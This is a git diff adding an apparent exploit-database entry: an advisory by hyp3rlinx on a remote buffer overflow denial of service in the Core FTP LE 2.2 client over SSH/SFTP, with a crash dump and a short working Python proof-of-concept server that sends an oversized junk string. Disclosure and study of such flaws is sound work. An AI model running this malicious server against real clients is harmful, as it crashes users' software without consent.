diff --git a/README.md b/README.md old mode 100755 new mode 100644 diff --git a/files.csv b/files.csv old mode 100755 new mode 100644 index 62393350c..a14c17815 --- a/files.csv +++ b/files.csv @@ -5280,6 +5280,7 @@ id,file,description,date,author,platform,type,port 40806,platforms/linux/dos/40806.py,"NTP 4.2.8p8 - Denial of Service",2016-11-21,"Magnus Klaaborg Stubman",linux,dos,0 40814,platforms/hardware/dos/40814.txt,"TP-LINK TDDP - Multiple Vulnerabilities",2016-11-22,"Core Security",hardware,dos,1040 40815,platforms/windows/dos/40815.html,"Microsoft Internet Explorer 8 MSHTML - 'Ptls5::Ls­Find­Span­Visual­Boundaries' Memory Corruption",2016-11-22,Skylined,windows,dos,0 +40828,platforms/windows/dos/40828.py,"Core FTP LE 2.2 - 'SSH/SFTP' Remote Buffer Overflow (PoC)",2016-11-27,hyp3rlinx,windows,dos,0 3,platforms/linux/local/3.c,"Linux Kernel 2.2.x / 2.4.x (RedHat) - 'ptrace/kmod' Privilege Escalation",2003-03-30,"Wojciech Purczynski",linux,local,0 4,platforms/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Buffer Overflow",2003-04-01,Andi,solaris,local,0 12,platforms/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,linux,local,0 diff --git a/platforms/windows/dos/40828.py b/platforms/windows/dos/40828.py new file mode 100755 index 000000000..db90ac263 --- /dev/null +++ b/platforms/windows/dos/40828.py @@ -0,0 +1,124 @@ +[+] Credits: John Page aka hyp3rlinx + +[+] Website: hyp3rlinx.altervista.org + +[+] Source: http://hyp3rlinx.altervista.org/advisories/CORE-FTP-REMOTE-SSH-SFTP-BUFFER-OVERFLOW.txt + +[+] ISR: ApparitionSec + + + +Vendor: +=============== +www.coreftp.com + + + +Product: +======================== +Core FTP LE (client) +v2.2 build 1883 + +Core FTP LE - free Windows software that includes the client FTP features +you need. Features like SFTP (SSH), SSL, TLS, FTPS, IDN, +browser integration, site to site transfers, FTP transfer resume, drag and +drop support, file viewing & editing, firewall support, +custom commands, FTP URL parsing, command line transfers, filters, and +much, much more. + + + +Vulnerability Type: +================================ +Remote SSH/SFTP Buffer Overflow + + + +CVE Reference: +============== +N/A + + + +Vulnerability Details: +===================== + +Core FTP client is vulnerable to remote buffer overflow denial of service +when connecting to a malicious server using +SSH/SFTP protocol. + +Upon receiving an overly long string of junk from the malicious FTP server +response, Core FTP crashes and the stack +is corrupted with several registers EBX, EDX, EDI being overwritten as can +be seen below. + +WinDbg dump... + +(d9c.16d8): Access violation - code c0000005 (first/second chance not +available) +eax=035b0000 ebx=00004141 ecx=03ac7e40 edx=41414141 esi=03ac7e38 +edi=41414141 +eip=77313ac3 esp=0439fa10 ebp=0439fae0 iopl=0 nv up ei pl nz ac pe +nc +cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b +efl=00010216 +ntdll!RtlImageNtHeader+0x92f: +77313ac3 8b12 mov edx,dword ptr [edx] + ds:002b:41414141=???????? + + + + +Exploit code(s): +=============== + +import socket + +print 'hyp3rlinx - Apparition Security' +print 'Core FTP SSH/SFTP Remote Buffer Overflow / DOS\r\n' +host='127.0.0.1' + +port = 22 +s = socket.socket() + +payload="A"*77500 +s.bind((host, port)) +s.listen(5) + +print 'Listening on port... %i' %port +print 'Connect to me!' + +while True: + conn, addr = s.accept() + conn.send(payload+'\r\n') + conn.close() + + + +Exploitation Technique: +======================= +Remote + + + +Severity Level: +=============== +High + + + + +[+] Disclaimer +The information contained within this advisory is supplied "as-is" with no +warranties or guarantees of fitness of use or otherwise. +Permission is hereby granted for the redistribution of this advisory, +provided that it is not altered except by reformatting it, and +that due credit is given. Permission is explicitly given for insertion in +vulnerability databases and similar, provided that due credit +is given to the author. The author is not responsible for any misuse of the +information contained herein and accepts no responsibility +for any damage caused by the use or misuse of this information. The author +prohibits any malicious use of security related information +or exploits by the author or elsewhere. + +hyp3rlinx